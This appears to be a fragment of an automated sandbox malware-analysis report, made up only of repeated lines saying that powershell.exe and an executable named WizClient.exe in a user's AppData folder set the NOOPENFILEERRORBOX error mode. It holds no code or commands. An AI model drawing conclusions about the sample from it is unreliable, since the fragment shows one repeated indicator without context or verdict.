            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
